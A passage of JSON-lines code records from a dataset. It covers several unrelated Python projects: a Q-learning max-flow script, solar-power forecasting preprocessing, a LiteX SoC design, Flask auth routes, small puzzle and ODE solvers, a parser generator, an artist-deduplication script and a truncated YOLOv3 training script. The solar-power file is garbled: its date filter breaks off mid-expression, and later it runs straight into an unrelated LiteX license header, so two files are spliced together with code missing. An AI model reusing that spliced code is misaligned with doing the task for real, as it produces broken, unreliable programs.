graph[i][j] = 1\n else:\n graph[i][j] = 0\n else:\n graph[i][j] = -1\n bond = agent(1, 0.9, graph)\n for i in range(episodes):\n bond.update()\n current = 0\n maxq = 0\n maxi = 0\n fin = False\n path = [0]\n count = 0\n for k in range(10):\n if bond.q[k][9] != 0:\n count+=1\n if count == 0:\n break\n while not fin:\n for i in range(10):\n if(bond.q[current][i] > maxq):\n maxq = bond.q[current][i]\n maxi = i\n path.append(maxi)\n if maxi == 9:\n fin = True\n else:\n current = maxi\n minf = 15\n for x in range(len(path)-1):\n minf = min(minf, ex_graph_1[path[x]][path[x+1]])\n maxf+=minf\n for x in range(len(path)-1):\n ex_graph_1[path[x]][path[x+1]] -= minf\n ex_graph_1[path[x+1]][path[x]] += minf\nprint(maxf)","sub_path":"gamenn.py","file_name":"gamenn.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"352164510","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport os\r\nimport fnmatch\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom scipy.stats import yeojohnson\r\nfrom tensorflow.python.keras.optimizer_v2.rmsprop import RMSProp\r\nfrom math import sqrt\r\nfrom numpy import concatenate\r\nfrom matplotlib import pyplot\r\nfrom pandas import read_csv, DataFrame, concat\r\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder, PowerTransformer\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, RepeatVector, LSTM, Input, TimeDistributed, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nfrom sklearn.compose import ColumnTransformer\r\nnp.set_printoptions(suppress=True)\r\n\r\n#variables\r\npowhr_start = 5\r\npowhr_end = 20\r\nshift_days = 3\r\nhoursteps = powhr_end-powhr_start+1 #(16)\r\ntimesteps = shift_days*hoursteps #hours step\r\ndata_dim = 7\r\nout_dim = 1\r\nn_model = 10\r\n\r\ndata_dir = '../Data'\r\nseason_mod = 'all_1102_f7'\r\ndate_start = '10190901'\r\ndate_end = '30191201'\r\nerr_date_list = ['20190912', '20191122', '20191130', '20191028', '20191107', '20191108', '20191109', '20191110', '20191111', '20191112', '20200214', '20200307', '20200308', '20200309', '20200310', '20200328', '20200329', '20200625', '20200809']\r\n\r\n#############################################\r\n# 종관기상관측\r\n#############################################\r\ndef get_weather():\r\n # pow 파일 load\r\n file_list = os.listdir(data_dir)\r\n print(len(file_list))\r\n for filename in os.listdir(data_dir):\r\n if fnmatch.fnmatch(filename, 'OBS_ASOS_TIM_*.csv'):\r\n print(filename)\r\n\r\n # load csv data\r\n dataset = read_csv(data_dir+'/'+filename, encoding='CP949')\r\n dataset.drop(['지점','지점명'], axis=1, inplace=True)\r\n dataset.drop(['기온 QC플래그','강수량 QC플래그','풍속 QC플래그','풍향 QC플래그','습도 QC플래그'], axis=1, inplace=True)\r\n dataset.drop(['현지기압 QC플래그','해면기압 QC플래그','일조 QC플래그','지면온도 QC플래그'], axis=1, inplace=True)\r\n dataset.drop(['5cm 지중온도(°C)','10cm 지중온도(°C)','20cm 지중온도(°C)','30cm 지중온도(°C)'], axis=1, inplace=True)\r\n dataset.drop(['3시간신적설(cm)','일사(MJ/m2)','운형(운형약어)','지면상태(지면상태코드)','현상번호(국내식)'], axis=1, inplace=True)\r\n\r\n # set column name\r\n dataset.columns = ['ymdhms', 'temprt', 'rain', 'wnd_spd', 'wnd_dir', 'humdt','steampressr', 'dewpnt', 'pressr','seapressr','sunshine','snow','cloud','cloud2','mincloud','visiblt','grd_temprt']\r\n\r\n # prioirty sort (피어슨상관계수)\r\n dataset = dataset[['ymdhms','sunshine','humdt','wnd_spd','visiblt','cloud2', 
'cloud','grd_temprt','wnd_dir','dewpnt','steampressr','temprt','mincloud','rain','pressr','seapressr','snow']]\r\n\r\n # set NA data (관측값 0이 누적되어 결측된 경우. 0으로 세팅)\r\n dataset['rain'].fillna(0, inplace=True) #강수량\r\n dataset['sunshine'].fillna(0, inplace=True) #일조\r\n dataset['snow'].fillna(0, inplace=True) #적설량\r\n\r\n #일시 패턴 변환(2019-08-20 5:00 -> 2019082005)\r\n dataset['ymdhms'] = dataset['ymdhms'].str[0:4]+dataset['ymdhms'].str[5:7]+dataset['ymdhms'].str[8:10]+dataset['ymdhms'].str[11:13]\r\n # pow측정값 중 결측값 많은 일자 제거\r\n dataset = dataset[(dataset['ymdhms'].str[0:8]>=date_start) & (dataset['ymdhms'].str[0:8]=str(powhr_start).rjust(2, '0')) &(dataset['ymdhms'].str[-2:]<=str(powhr_end))]\r\n dataset = dataset.interpolate(method='linear')# 결측값 보간\r\n \r\n # save file (test용)\r\n dataset.to_csv(data_dir+\"/weather.csv\",mode='w',index=False)\r\n\r\n # normalization\r\n dataset.drop(['ymdhms'], axis=1, inplace=True)\r\n dataset = dataset.astype('float32')\r\n dataset = dataset.interpolate(method='linear')\r\n \r\n #YEO-JOHNSON transform\r\n yeo_df = yeo_johnson_transform(dataset)\r\n \r\n #insert feature (test)\r\n yeo_df.insert(2, 'temp_press', yeo_df['temprt']-yeo_df['steampressr'], True)\r\n yeo_df.insert(2, 'sunshine_humdt', abs(yeo_df['sunshine'])-(yeo_df['humdt']*(2.1)), True)#0.35\r\n \r\n sc = MinMaxScaler(feature_range = (0, 1))#scale\r\n scaled_weather = sc.fit_transform(yeo_df.values)\r\n weather = pd.DataFrame(scaled_weather, columns=yeo_df.columns, index=list(yeo_df.index.values))\r\n print(\"before : \", weather.shape)\r\n weather = weather.iloc[:, 0:data_dim] #feature size 조절\r\n print(\"after : \", weather.shape)\r\n \r\n return weather\r\n\r\n#############################################\r\n# 태양광 전력\r\n#############################################\r\ndef get_pow():\r\n\r\n # pow 파일 load\r\n dir_path = data_dir+\"/pow_24/UR00000126_csv\"\r\n file_list = os.listdir(dir_path)\r\n print(len(file_list))\r\n hrPow = [] \r\n\r\n # pow측정값 에러가 큰 일자 제거\r\n for filename in file_list:\r\n if (filename[:-4] not in err_date_list):\r\n if ((filename[:-4]>=date_start) & (filename\n# License: BSD\n\nfrom migen import *\n\nfrom litex.build.io import CRG\n\nfrom litex.soc.integration.soc_core import SoCMini\n\nfrom litescope import LiteScopeIO, LiteScopeAnalyzer\n\n# LiteScope SoC ------------------------------------------------------------------------------------\n\nclass LiteScopeSoC(SoCMini):\n def __init__(self, platform):\n sys_clk_freq = int((1e9/platform.default_clk_period))\n\n # SoCMini ----------------------------------------------------------------------------------\n SoCMini.__init__(self, platform, sys_clk_freq,\n csr_data_width = 32,\n with_uart = True,\n uart_name = \"bridge\",\n ident = \"Litescope example design\",\n ident_version = True,\n )\n\n # CRG --------------------------------------------------------------------------------------\n self.submodules.crg = CRG(platform.request(platform.default_clk_name))\n\n # Litescope IO -----------------------------------------------------------------------------\n self.submodules.io = LiteScopeIO(8)\n self.add_csr(\"io\")\n for i in range(8):\n try:\n self.comb += platform.request(\"user_led\", i).eq(self.io.output[i])\n except:\n pass\n\n # Litescope Analyzer -----------------------------------------------------------------------\n analyzer_groups = {}\n\n # Counter group\n counter = Signal(16, name_override=\"counter\")\n zero = Signal(name_override=\"zero\")\n self.sync += counter.eq(counter + 1)\n self.comb += zero.eq(counter == 
0)\n analyzer_groups[0] = [\n zero,\n counter,\n ]\n\n # Communication group\n analyzer_groups[1] = [\n platform.lookup_request(\"serial\").tx,\n platform.lookup_request(\"serial\").rx,\n self.bus.masters[\"uartbone\"],\n ]\n\n # FSM group\n fsm = FSM(reset_state=\"STATE1\")\n self.submodules += fsm\n fsm.act(\"STATE1\",\n NextState(\"STATE2\")\n )\n fsm.act(\"STATE2\",\n NextState(\"STATE1\")\n )\n analyzer_groups[2] = [\n fsm,\n ]\n\n # Analyzer\n self.submodules.analyzer = LiteScopeAnalyzer(analyzer_groups, 512, csr_csv=\"test/analyzer.csv\")\n self.add_csr(\"analyzer\")\n\ndefault_subtarget = LiteScopeSoC\n","sub_path":"examples/targets/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638837760","text":"from flask import Blueprint\nfrom flask_restful import Api, Resource\nfrom web.modules.auth.controllers import (AuthorizationController,\n IsAuthenticatedController,\n LogoutController, RefreshController,\n RegistrationController)\n\nbp = Blueprint('oauth', __name__)\napi = Api(bp)\n\n\"\"\"[define routing under oauth module]\n\"\"\"\napi.add_resource(RegistrationController, '/registration')\napi.add_resource(AuthorizationController, '/authorization')\napi.add_resource(RefreshController, '/refresh')\napi.add_resource(IsAuthenticatedController, '/isauthenticated')\napi.add_resource(LogoutController, '/logout')\n","sub_path":"web/modules/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"191088542","text":"import sys\nread=lambda:sys.stdin.readline().strip()\nwrite=lambda x:sys.stdout.write(x+\"\\n\")\ntable = [[None for _ in range(15)] for __ in range(5)]\nfor i in range(5):\n line = read()\n for j, ch in enumerate(line):\n table[i][j] = ch\nsb = ''\nfor j in range(15):\n for i in range(5):\n v = table[i][j]\n if not v:\n continue\n sb += v\nwrite(sb)\n\n","sub_path":"KOI/vertical_reading_10798.py","file_name":"vertical_reading_10798.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"366050943","text":"\"\"\"\nEmpirically evaluate the asymptotic error behavior of\ndifferent numerical methods of solving diff eqs.\n\"\"\"\n\nimport math\n\nfrom scipy.integrate import odeint\n\nfrom diffeq.numerical import (euler_step, rk2_step, rk3_step, third_order_step, fourth_order_step,\n numerical_solve)\n\n\nSTEP_FNS = {\n 'euler': euler_step,\n 'rk2': rk2_step,\n 'rk3': rk3_step,\n '3rd': third_order_step,\n '4th': fourth_order_step,\n}\n\n\ndef main():\n print('Evaluating single steps...')\n evaluate_steps()\n print('Evaluating full solutions...')\n evaluate_solutions()\n\n\ndef evaluate_steps():\n fns = [lambda x, y: y ** 2 - x,\n lambda x, y: x ** 2 - y,\n lambda x, y: math.sin(x) * math.cos(y)]\n for i, fn in enumerate(fns):\n print('Equation %d:' % i)\n solution1 = odeint(fn, 0, [1, 1.15], tfirst=True)[-1][0]\n solution2 = odeint(fn, 0, [1, 1.3], tfirst=True)[-1][0]\n for name, step_fn in STEP_FNS.items():\n _, approx1 = step_fn(fn, 1, 0, 0.15)\n _, approx2 = step_fn(fn, 1, 0, 0.3)\n error1 = abs(approx1 - solution1)\n error2 = abs(approx2 - solution2)\n print(' - %s: halving factor %f (error=%e)' % (name, error2 / error1, error1))\n\n\ndef evaluate_solutions():\n fns = [lambda x, y: y ** 2 - x,\n lambda x, y: x ** 2 - y,\n lambda x, 
y: math.sin(x) * math.cos(y)]\n for i, fn in enumerate(fns):\n print('Equation %d:' % i)\n solution = odeint(fn, 0, [1, 2], tfirst=True)[-1][0]\n for name, step_fn in STEP_FNS.items():\n solution1 = last(numerical_solve(fn, 1, 0, 2, h=0.1, step_fn=step_fn))[1]\n solution2 = last(numerical_solve(fn, 1, 0, 2, h=0.05, step_fn=step_fn))[1]\n error1 = abs(solution - solution1)\n error2 = abs(solution - solution2)\n print(' - %s: halving factor %f (error=%e)' % (name, error1 / error2, error2))\n\n\ndef last(iterator):\n y = None\n for x in iterator:\n y = x\n return y\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"eval_numerical.py","file_name":"eval_numerical.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392315304","text":"class Solution:\n def largeGroupPositions(self, S):\n \"\"\"\n :type S: str\n :rtype: List[List[int]]\n \"\"\"\n cur_c = ''\n cur_c_cnt = 0\n cur_c_start = 0\n large_groups = []\n\n for i, c in enumerate(S):\n if c != cur_c:\n if cur_c_cnt >= 3:\n large_groups.append([cur_c_start,i-1])\n cur_c = c\n cur_c_cnt = 1\n cur_c_start = i\n else:\n cur_c_cnt +=1\n \n # handle the case of ending on a single word\n if cur_c_cnt >= 3:\n large_groups.append([cur_c_start,i])\n \n return large_groups\n \n ","sub_path":"830_large_groups.py","file_name":"830_large_groups.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"410944568","text":"from code_generator_constants import *\r\nfrom grammar_sets import *\r\n\r\ndef createSynthia():\r\n createSynthiaHead()\r\n createSynthiaProdChecks()\r\n createSynthiaMain()\r\n\r\ndef createSynthiaHead():\r\n with open(GEN_PATH + 'synthia_base.py', 'r') as f:\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'w')\r\n file.write(f.read())\r\n file.close()\r\n\r\ndef createSynthiaProdChecks():\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n\r\n production_rules = []\r\n with open(GEN_PATH + 'grammar_productions.log', 'r') as f:\r\n production_rules = f.readlines()\r\n\r\n prod_rules = []\r\n for production_rule in production_rules:\r\n prod_rules.append(production_rule.replace('\\n', '').split('->'))\r\n\r\n for prod_rule in prod_rules:\r\n prod_rule[0] = prod_rule[0].replace(' ', '')\r\n prod_rule[1] = prod_rule[1].split('|')\r\n for sides in prod_rule[1]:\r\n sides = sides.split(\" \")\r\n\r\n for prod_rule in prod_rules:\r\n LHSs = []\r\n for LHS in prod_rule[1]:\r\n LHS = LHS.split(\" \")\r\n LHSs.append([x for x in LHS if x != ''])\r\n prod_rule[1] = LHSs\r\n\r\n for prod_rule in prod_rules:\r\n createSynthiaProdCheck(prod_rule)\r\n\r\n file.close()\r\n\r\ndef createSynthiaProdCheck(prod_rule):\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n\r\n file.write('\\n def ' + prod_rule[0] + '(self):\\n')\r\n prods = prod_rule[1]\r\n# file.write(' print(\"' + prod_rule[0] + ' called\")\\n')\r\n file.write(' if not(self.skipErrors(\"' + prod_rule[0] + '\")): return False\\n')\r\n\r\n isEpsilonIn = ['EPSILON'] in prods\r\n first_prod = prods.pop(0)\r\n file.write(' if self.checkFirst(' + str(first_prod) +'):\\n')\r\n file.write(' if (')\r\n for index, element in enumerate(first_prod):\r\n if index < len(first_prod) - 1:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '() and ')\r\n else:\r\n file.write('self.match(\"' + element + '\") and ')\r\n else:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' 
+ element + '()')\r\n else:\r\n file.write('self.match(\"' + element + '\")')\r\n file.write('):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> ' + ' '.join(first_prod) + '\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> ' + ' '.join(first_prod) + '\")\\n')\r\n file.write(' return True\\n')\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n if len(prods) > 0:\r\n for prod in prods:\r\n if prod != ['EPSILON']:\r\n file.write(' elif self.checkFirst(' + str(prod) +'):\\n')\r\n file.write(' if (')\r\n for index, element in enumerate(prod):\r\n if index < len(prod) - 1:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '() and ')\r\n else:\r\n file.write('self.match(\"' + element + '\") and ')\r\n else:\r\n if not(element in TERMINAL_LIST):\r\n file.write('self.' + element + '()')\r\n else:\r\n file.write('self.match(\"' + element + '\")')\r\n file.write('):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> ' + ' '.join(prod) + '\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> ' + ' '.join(prod) + '\")\\n')\r\n file.write(' return True\\n')\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n if isEpsilonIn:\r\n file.write(' elif self.checkFollow([\"' + prod_rule[0] +'\"]):\\n')\r\n file.write(' self._productions.append(\"' + prod_rule[0] +' -> EPSILON\")\\n')\r\n# file.write(' print(\"' + prod_rule[0] +' -> EPSILON\")\\n')\r\n file.write(' return True\\n')\r\n\r\n file.write(' else:\\n')\r\n file.write(' return False\\n')\r\n\r\n file.close()\r\n\r\ndef createSynthiaMain():\r\n with open(GEN_PATH + 'synthia_main.py', 'r') as f:\r\n file = open(SYNTHIA_PATH + 'synthia.py', 'a')\r\n file.write(f.read())\r\n file.close()\r\n\r\nif __name__ == \"__main__\":\r\n createSynthia()\r\n","sub_path":"src/syntactic_analyzer/gen/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"338373490","text":"__author__ = 'Dazdingo'\n\nBOT_NAME = 'orcinus_price spiders'\n\nSPIDER_MODULES = ['crawl.spiders']\nNEWSPIDER_MODULE = 'crwal.spiders'\nITEM_PIPELINES = {\n 'crawl.pipelines.BookPipeline': 300,\n 'crawl.pipelines.DetailPipeline': 800,\n}\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36'\n#LOG_FILE = 'C:/Users/Administrator/Source/Repos/orcinus_price/crawl/error.txt'\nLOG_FILE = 'log/error.txt'\nLOG_ENABLED = False","sub_path":"crawl/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585067788","text":"import re\nfrom typing import Any\n\nfrom tidysic.tag import Tag\n\n\nclass FormattedString:\n '''\n A formatted string contains tag keys written in double\n curly brackets, such as `{{artist}}`.\n\n The double brackets are useful if you want to insert text\n that will only be displayed if the tag is not None. For\n instance, the string\n\n `{{track}. }{{title}}`\n\n will become\n\n `1. Intro`\n\n if the `track` tag is defined. Otherwise, it will just\n be\n\n `Intro`\n\n The `year` and `track` tags can be formatted as usual, seeing\n as they are integer values. This way, track numbers may be\n padded using:\n\n `{{track:02d}. 
}{{title}}`\n '''\n\n def __init__(self, string: str):\n try:\n FormattedString.assert_well_written(string)\n except AssertionError as e:\n raise ValueError(\n f'Could not create FormattedString from {string}: {e}'\n )\n\n self._str = string\n\n def build(self, tags: dict[Tag, Any]) -> str:\n pattern = r'\\{(.*?\\{(\\w+)(:.+?)?\\}.*?)\\}'\n matches = re.findall(pattern, self._str)\n\n return_string = self._str\n\n substitutions = []\n for to_substitute, tag_name, format_spec in matches:\n\n value = None\n tag = Tag[tag_name.capitalize()]\n\n value = tags[tag]\n if tag in {Tag.Year, Tag.Track} and value:\n value = int(value)\n if tag in {Tag.Title, Tag.Artist, Tag.Album} and not value:\n value = f'Unknown {tag.name}'\n\n formattable = to_substitute.replace(\n f'{{{tag_name}{format_spec}}}',\n f'{{{format_spec}}}'\n )\n substitutions.append((\n f'{{{to_substitute}}}',\n formattable.format(value) if value else ''\n ))\n\n for old, new in substitutions:\n return_string = return_string.replace(old, new)\n\n return return_string\n\n @staticmethod\n def assert_well_written(string: str):\n '''\n Runs a series of assert statements that will pass only if the provided\n string has a correct format. Refer to the class' documentation for more\n info on the format.\n\n Args:\n string (str): String whose format to test.\n '''\n bracket_depth = 0\n current_tag_name = ''\n\n for i, char in enumerate(string):\n if char == '{':\n bracket_depth += 1\n assert bracket_depth <= 2, (\n f'Too many opening brackets (col {i})'\n )\n\n elif char == '}':\n bracket_depth -= 1\n assert bracket_depth >= 0, (\n f'Too many closing brackets (col {i})'\n )\n\n if bracket_depth == 0:\n assert current_tag_name in {\n tag.name.lower()\n for tag in Tag\n }, (\n f'Invalid tag name {current_tag_name}'\n )\n current_tag_name = ''\n\n elif bracket_depth == 2:\n current_tag_name += char\n","sub_path":"tidysic/formatted_string.py","file_name":"formatted_string.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"55732878","text":"from os.path import join, realpath, dirname\nimport os\nfrom difflib import SequenceMatcher\nfrom multiprocessing import Pool\nimport re\nfrom collections import Counter\nimport pandas as pd\n\nfrom models import SourceArtist, CleanedArtist, sqlite_db, data_path\n\n\nmy_data = None\n\n### Part 1\n# a) TODO (complete in models.py)\n\n# b) TODO\nif __name__ == '__main__':\n\tartist_csv = join(dirname(realpath(__file__)), 'data/sothebys_artists.csv')\n\tsqlite_db.init(data_path)\n\tif sqlite_db.connect():\n\t\tprint(\"Connected to database\")\n\n\tsqlite_db.drop_tables([SourceArtist, CleanedArtist])\n\tsqlite_db.create_tables([SourceArtist, CleanedArtist])\n\tprint(\"Database Initialized\")\n\n# c) TODO\n\t#Read data from csv to panda\n\tdata = pd.read_csv(artist_csv)\n\n\t#rename fields of csv\n\tdata = data.rename(index=str, columns={\"name\": \"artist\", \"birth_year\": \"birth\", \"death_year\": \"death\"})\n\tdataDict = data.to_dict('records')\n\n\t#Insert data to database\n\tstep = 150\n\tfor i in range(0, len(dataDict), step):\n\t\tquery = SourceArtist.insert_many(dataDict[i:i+step])\n\t\tquery.execute()\n\n## Part 2\n# a)\n\t#Put data in a dataframe\n\tquery = SourceArtist.select(SourceArtist.artist, SourceArtist.birth, SourceArtist.death)\n\tmy_data = pd.DataFrame(list(query.dicts()))\n\tprint(len(my_data), \"records read from database\")\n\n# b,c)\ndef Data_Extractor(data):\n\t#Regex that breaks sentence 
where there is no letter\n\tregex_for_name = r\"(\\w+?)\\W\"\n\t#Regex that finds all 4-digit numbers\n\tregex_for_no = r\"([0-9][0-9][0-9][0-9])\"\n\n\tfor index, row in data.iterrows():\n\t\tif index%1000 == 0:\n\t\t\tprint(\"Process\", os.getpid(), \":\", index)\n\n\t\tmatches = re.findall(regex_for_no, row['artist'])\n\t\t#If only one 4 digit put in birth\n\t\tif len(matches) == 1:\n\t\t\tdata.loc[index, \"birth\"] = matches[0]\n\t\telif len(matches) >= 2:\n\t\t\t#Put the two dates into \"birth\" and \"death\"\n\t\t\tif matches[0] < matches[1]:\n\t\t\t\tdata.loc[index, \"birth\"] = matches[0]\n\t\t\t\tdata.loc[index, \"death\"] = matches[1]\n\t\t\telse:\n\t\t\t\tdata.loc[index, \"birth\"] = matches[1]\n\t\t\t\tdata.loc[index, \"death\"] = matches[0]\n\t\t#How to find artist name\n\t\tartist = re.findall(regex_for_name, row['artist'] + ' ')\n\t\tline = ''\n\t\ti = 0\n\t\t#Put in string until digit found(usually the dates)\n\t\twhile i < len(artist) and not artist[i].isdigit():\n\t\t\tif artist[i] not in [\"br\", \"nbsp\", \"b\", \"d\", \"dit\"]:\n\t\t\t\tline = line + artist[i] + \" \"\n\t\t\ti = i + 1\n\t\tif 'by' in line:\n\t\t\tline = line.split('by')[1]\n\t\tdata.loc[index, \"artist\"] = line.strip()\n\treturn data\n\n# Split data into parts\ndef data_splitter(number_of_parts, data):\n\tpart_Size = int(len(data)/number_of_parts)\n\tdata_parts = []\n\tfor i in range(0, number_of_parts-1):\n\t\tdata_parts.append(data.iloc[part_Size*i :part_Size*(i+1), : ])\n\tdata_parts.append(data.iloc[part_Size*(number_of_parts-1):, : ])\n\treturn data_parts\n\n#Run multiple processes\nif __name__ == '__main__':\n\tnumber_of_processes = 8\n\tpool = Pool(number_of_processes)\n\tprint('Cleaning data based on regex parsing...')\n\tmy_data = pd.concat(pool.map(Data_Extractor, data_splitter(number_of_processes, my_data)))\n\tpool.close()\n\tprint('Cleaning done.')\n\tprint('')\n\n# d,e)\n\n#Deduplication based on string similarity\ndef deduplicate(original_row, data_to_check):\n\t#remove first elements from original_row to avoid duplicates during result merging\n\tif len(original_row['birth']) > 0:\n\t\tdel original_row['birth'][0]\n\tif len(original_row['death']) > 0:\n\t\tdel original_row['death'][0]\n\tname_to_check = original_row['name'].pop(0)\n\toriginal_row['count'] -= 1\n\tfor index in range(0, len(data_to_check)):\n\t\tif index < len(data_to_check):\n\t\t\trow = data_to_check.iloc[index]\n\t\t\tratio = SequenceMatcher(None, name_to_check.lower(), row['artist'].lower()).ratio()\n\t\t\tif ratio > 0.8:\n\t\t\t\toriginal_row['name'].append(row['artist'])\n\t\t\t\toriginal_row['birth'].append(row['birth'])\n\t\t\t\toriginal_row['death'].append(row['death'])\n\t\t\t\toriginal_row['count'] += 1\n\t\t\t\tdata_to_check.drop(inplace=True, index=data_to_check.index[index])\n\t\t\t\tdata_to_check.reset_index(inplace=True, drop=True)\n\t\t\t\tindex -= 1\n\t\tindex += 1\n\t#Return both the original_row containing the metrics and the data_to_check containing the deduplicated dataset\n\treturn (original_row, data_to_check)\n\nif __name__ == '__main__':\n\tindex = 0\n\twhile index < len(my_data):\n\t\t#Get the current row from the data\n\t\trow_outter = my_data.iloc[index]\n\n\t\t#Skip names containing numerals (for names containing century)\n\t\tif any(char.isdigit() for char in row_outter['artist']):\n\t\t\tprint(\"Record with artist name\", row_outter['artist'], \"skipped.\")\n\t\t\tmy_data.drop(inplace=True, index=my_data.index[index])\n\t\t\tcontinue\n\n\t\t#Initialize values\n\t\tname = 
[row_outter['artist']]\n\t\tbirth = []\n\t\tdeath = []\n\t\tcount = 1\n\n\t\t#Check birth and death in order to ensure they are numerals\n\t\tif row_outter['birth'] is not None and isinstance(row_outter['birth'], float):\n\t\t\tbirth.append(row_outter['birth'])\n\t\tif row_outter['death'] is not None and isinstance(row_outter['death'], float):\n\t\t\tdeath.append(row_outter['death'])\n\n\t\t#Print the name being checked and the remaining size of the data\n\t\tprint(\"Artist\", name[0], \"deduplicatation started with\", len(my_data), \"records still remaining in database\")\n\n\t\t#Split the remaining data into parts and run a multithreaded similarity based search on them\n\t\tif __name__ == '__main__':\n\t\t\tsearch_pool = Pool(int(number_of_processes))\n\t\t\targs = []\n\t\t\tparts = data_splitter(int(number_of_processes), my_data.iloc[index+1:, :])\n\t\t\tfor part in parts:\n\t\t\t\targs.append(({'name':name, 'birth':birth, 'death':death, 'count':count}, part))\n\t\t\tsearch_results = search_pool.starmap(deduplicate, args)\n\t\t\tsearch_pool.close()\n\n\t\t#Merge results\n\t\tdata_parts = []\n\t\tfor res in search_results:\n\t\t\t#res[0] is the data exctracted and res[1] is the deduplicated dataset for each partition\n\t\t\tname = name + res[0]['name']\n\t\t\tbirth = birth + res[0]['birth']\n\t\t\tdeath = death + res[0]['death']\n\t\t\tcount += res[0]['count']\n\t\t\tdata_parts.append(res[1])\n\t\tmy_data = pd.concat(data_parts)\n\t\tmy_data.reset_index(inplace=True, drop=True)\n\t\tname = Counter(name).most_common(1)[0][0]\n\t\n\t\t#Clear the nan values from birth and death arrays\n\t\tbirth = [x for x in birth if str(x) != 'nan']\n\t\tdeath = [x for x in death if str(x) != 'nan']\n\t\tif len(birth) > 0:\n\t\t\tbirth = Counter(birth).most_common(1)[0][0]\n\t\telse:\n\t\t\tbirth = None\n\t\tif len(death) > 0:\n\t\t\tdeath = Counter(death).most_common(1)[0][0]\n\t\telse:\n\t\t\tdeath = None\n\t\n\t\t#Print results for the current artist\n\t\tprint(\"Deduplication resuls:\")\n\t\tprint(\"Name:\", name)\n\t\tprint(\"Birth:\", birth)\n\t\tprint(\"Death:\", death)\n\t\tprint(\"Count:\", count)\n\n\t\t#Insert into database the deduplicated entry\n\t\tres = CleanedArtist.insert({'artist':name, 'birth': birth, 'death': death, 'count': count}).execute()\n\t\tif res is not None and res > 0:\n\t\t\tprint(\"Record for\", name, \"inserted to CleanedArtist\")\n\t\tprint('')\n\t\t#index does not need to be incremented because we delete the current row in line 158, so we will just look at row 0 untill all rows are deleted\n\t\t#index += 1\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334360576","text":"from absl import app, flags, logging\nfrom absl.flags import FLAGS\nimport tensorflow as tf\nimport numpy as np\nimport os, shutil\nfrom tensorflow.keras.callbacks import (\n ReduceLROnPlateau,\n EarlyStopping,\n ModelCheckpoint,\n TensorBoard\n)\nfrom yolov3_tf2.models import (\n YoloV3, YoloV3Tiny, YoloLoss,\n yolo_anchors, yolo_anchor_masks,\n yolo_tiny_anchors, yolo_tiny_anchor_masks\n)\nfrom yolov3_tf2.utils import freeze_all\nimport yolov3_tf2.dataset as dataset\n\nflags.DEFINE_string('dataset', '', 'path to dataset')\nflags.DEFINE_boolean('tiny', False, 'yolov3 or yolov3-tiny')\nflags.DEFINE_string('weights', './checkpoints/yolov3.tf',\n 'path to weights file')\nflags.DEFINE_string('classes', './data/coco.names', 'path to classes 
file')\nflags.DEFINE_string('name', '', 'output file name to save')\nflags.DEFINE_string('gpu', '', 'name of gpu to use')\nflags.DEFINE_enum('mode', 'fit', ['fit', 'eager_fit', 'eager_tf'],\n 'fit: model.fit, '\n 'eager_fit: model.fit(run_eagerly=True), '\n 'eager_tf: custom GradientTape')\nflags.DEFINE_enum('transfer', 'none',\n ['none', 'darknet', 'no_output', 'frozen', 'fine_tune'],\n 'none: Training from scratch, '\n 'darknet: Transfer darknet, '\n 'no_output: Transfer all but output, '\n 'frozen: Transfer and freeze all, '\n 'fine_tune: Transfer all and freeze darknet only')\nflags.DEFINE_integer('size', 416, 'image size')\nflags.DEFINE_integer('epochs', 2, 'number of epochs')\nflags.DEFINE_integer('batch_size', 8, 'batch size')\nflags.DEFINE_float('learning_rate', 1e-3, 'learning rate')\nflags.DEFINE_integer('num_classes', 80, 'number of classes in the model')\n\n\ndef get_free_gpu():\n \"\"\"Selects the gpu with the most free memory\n \"\"\"\n import subprocess\n import numpy as np\n\n output = subprocess.Popen('nvidia-smi -q -d Memory 